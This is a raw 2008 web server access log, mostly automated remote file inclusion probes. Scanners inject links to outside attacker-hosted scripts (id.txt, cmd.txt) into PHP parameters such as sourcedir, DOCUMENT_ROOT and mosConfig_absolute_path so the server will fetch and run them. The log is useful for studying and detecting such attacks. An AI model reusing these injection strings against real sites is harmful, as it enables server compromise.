206.117.237.200 - - [29/Jul/2008:11:36:38 -0700] "GET /logs//playing.php/common/db.php?commonpath=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:36:38 -0700] "GET /logs/access_080507.log//playing.php/common/db.php?commonpath=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:36:39 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:36:40 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:36:41 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.803" "www.dmulk.com"
193.233.85.46 - - [29/Jul/2008:11:37:11 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://myminidump.t35.com/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.233.85.46 - - [29/Jul/2008:11:37:11 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://myminidump.t35.com/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.233.85.46 - - [29/Jul/2008:11:37:11 -0700] "GET /logs/access_080225.log//modules/My_eGallery/public/displayCategory.php?basepath=http://myminidump.t35.com/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.48.146 - - [29/Jul/2008:11:37:24 -0700] "GET /logs/access_080207.log/errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:37:42 -0700] "GET /logs/access_080218.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
204.9.124.118 - - [29/Jul/2008:11:37:43 -0700] "GET /logs/access_080329.log%20//agendax/addevent.inc.php?agendax_path=http://www.benjaminclayton.co.uk//skins/advanced/dhelp01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:37:45 -0700] "GET /logs/access_080218.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.233.85.46 - - [29/Jul/2008:11:37:55 -0700] "GET /logs/access_080128.log//modules/My_eGallery/public/displayCategory.php?basepath=http://myminidump.t35.com/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:11:37:59 -0700] "GET /presto/?M=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:38:03 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:38:06 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.233.85.46 - - [29/Jul/2008:11:38:07 -0700] "GET /logs/access_080103.log/include/admin.lib.inc.php?site_path=http://myminidump.t35.com/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.233.85.46 - - [29/Jul/2008:11:38:07 -0700] "GET /logs/include/admin.lib.inc.php?site_path=http://myminidump.t35.com/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.233.85.46 - - [29/Jul/2008:11:38:07 -0700] "GET /include/admin.lib.inc.php?site_path=http://myminidump.t35.com/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.233.85.46 - - [29/Jul/2008:11:38:13 -0700] "GET /logs/access_080128.log/include/admin.lib.inc.php?site_path=http://myminidump.t35.com/v6/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:38:14 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.245.192.26 - - [29/Jul/2008:11:38:15 -0700] "GET //playing.php/common/db.php?commonpath=http://www.v8rx7forum.com/includes/paymentapi/log.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:38:18 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:38:18 -0700] "GET /logs/access_080328.log//playing.php/common/db.php?commonpath=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:38:18 -0700] "GET //playing.php/common/db.php?commonpath=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:38:18 -0700] "GET /logs//playing.php/common/db.php?commonpath=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:38:18 -0700] "GET /logs/access_080507.log//playing.php/common/db.php?commonpath=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.90.180.3 - - [29/Jul/2008:11:38:21 -0700] "GET /logs/access.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.90.180.3 - - [29/Jul/2008:11:38:21 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.90.180.3 - - [29/Jul/2008:11:38:21 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:38:23 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:38:28 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.90.180.3 - - [29/Jul/2008:11:38:53 -0700] "GET /errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.90.180.3 - - [29/Jul/2008:11:38:53 -0700] "GET /logs/access_080315.log/errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.90.180.3 - - [29/Jul/2008:11:38:54 -0700] "GET /logs/errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:38:56 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:38:57 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:11:39:01 -0700] "GET /bikes/dteel/EQ2/?N=A HTTP/1.0" 200 825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.90.180.3 - - [29/Jul/2008:11:39:02 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/Jul/2008:11:39:39 -0700] "GET /errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.48.146 - - [29/Jul/2008:11:39:42 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.48.146 - - [29/Jul/2008:11:39:42 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.48.146 - - [29/Jul/2008:11:39:42 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.112.193.46 - - [29/Jul/2008:11:39:43 -0700] "GET /logs/access_080315.log/errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/Jul/2008:11:39:43 -0700] "GET /logs/errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:39:45 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:39:47 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:39:48 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:39:50 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18353 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:40:00 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:40:03 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 200 18453 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.87.117 - - [29/Jul/2008:11:40:04 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:40:07 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:40:09 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:40:11 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.48.87 - - [29/Jul/2008:11:40:18 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://secure.steponline.org/cmd? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:40:23 -0700] "GET /logs/access_080313.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:40:24 -0700] "GET /?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 18369 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:40:25 -0700] "GET /logs/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 200 58281 "-" "libwww-perl/5.65" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:40:30 -0700] "GET /logs/access_080218.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.72.181.15 - - [29/Jul/2008:11:40:42 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [29/Jul/2008:11:40:43 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.112.193.46 - - [29/Jul/2008:11:40:47 -0700] "GET /logs/access_080207.log/errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/Jul/2008:11:40:50 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/Jul/2008:11:40:53 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/Jul/2008:11:40:53 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.130 - - [29/Jul/2008:11:41:18 -0700] "GET /logs/access_080218.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.196.5.189 - - [29/Jul/2008:11:41:39 -0700] "GET /components/com_content/errors.php?error=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:42:05 -0700] "GET /logs/access_080128.log/include/admin.lib.inc.php?site_path=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:42:05 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:42:05 -0700] "GET /logs/include/admin.lib.inc.php?site_path=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:42:10 -0700] "GET /logs/access_080218.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
204.15.10.22 - - [29/Jul/2008:11:42:20 -0700] "GET /logs//includes/messages.inc.php?include_path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
204.15.10.22 - - [29/Jul/2008:11:42:20 -0700] "GET //includes/messages.inc.php?include_path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:42:32 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:42:32 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:42:32 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:42:35 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:42:35 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:42:35 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.11.67.242 - - [29/Jul/2008:11:42:46 -0700] "GET /logs/access_080218.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.90.180.3 - - [29/Jul/2008:11:42:51 -0700] "GET /logs/access_080207.log/errors.php?error=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:11:42:52 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:11:42:52 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [29/Jul/2008:11:42:53 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://genthal.com/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:42:54 -0700] "GET /logs/access_080128.log/include/admin.lib.inc.php?site_path=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:42:55 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:42:55 -0700] "GET /logs/include/admin.lib.inc.php?site_path=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.72.181.15 - - [29/Jul/2008:11:42:55 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [29/Jul/2008:11:42:55 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.67.119 - - [29/Jul/2008:11:43:05 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.119 - - [29/Jul/2008:11:43:07 -0700] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.211.43 - - [29/Jul/2008:11:43:11 -0700] "GET /presto/?D=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:43:15 -0700] "GET /logs/access_080105.log/include/admin.lib.inc.php?site_path=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.155.28 - - [29/Jul/2008:11:43:17 -0700] "GET /logs/access_080329.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.iwsbr.net/vitinho/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.155.28 - - [29/Jul/2008:11:43:17 -0700] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.iwsbr.net/vitinho/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.155.28 - - [29/Jul/2008:11:43:17 -0700] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.iwsbr.net/vitinho/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:43:18 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:43:18 -0700] "GET /logs/access_080218.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:43:18 -0700] "GET /logs/access_071219.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:43:18 -0700] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:11:43:19 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:43:22 -0700] "GET /logs/access_071219.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:43:22 -0700] "GET /logs/access_080118.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.119 - - [29/Jul/2008:11:43:24 -0700] "GET /logs/access_071225.log/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.119 - - [29/Jul/2008:11:43:25 -0700] "GET /logs/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:43:26 -0700] "GET /logs/access_080128.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:43:37 -0700] "GET /logs/access_080128.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:43:37 -0700] "GET /logs/access.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
77.221.130.15 - - [29/Jul/2008:11:43:39 -0700] "GET /logs/access_080207.log/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [29/Jul/2008:11:43:39 -0700] "GET /errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [29/Jul/2008:11:43:40 -0700] "GET /logs/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.186.15.66 - - [29/Jul/2008:11:43:51 -0700] "GET /sitemap/sitemap.xml.php?mosConfig_admin_path=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
91.186.15.66 - - [29/Jul/2008:11:43:51 -0700] "GET /logs/sitemap/sitemap.xml.php?mosConfig_admin_path=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
195.5.163.212 - - [29/Jul/2008:11:43:53 -0700] "GET /logs/access_080218.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.5.163.212 - - [29/Jul/2008:11:43:53 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.5.163.212 - - [29/Jul/2008:11:43:54 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [29/Jul/2008:11:43:55 -0700] "GET /logs/access.log/?sourcedir=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:44:00 -0700] "GET /logs/access_080313.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.247.64.150 - - [29/Jul/2008:11:44:00 -0700] "GET /logs/access.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [29/Jul/2008:11:44:01 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.247.64.150 - - [29/Jul/2008:11:44:01 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://tutoriaisclube.com/cmd????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
206.117.237.200 - - [29/Jul/2008:11:44:01 -0700] "GET /logs/access_080105.log/include/admin.lib.inc.php?site_path=http://www.proostjes.be/calendar/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:44:03 -0700] "GET /logs/access_071224.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:11:44:09 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.43.121.242 - - [29/Jul/2008:11:44:10 -0700] "GET /logs/access_080313.log//modules/vwar/admin/admin.php?vwar_root=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
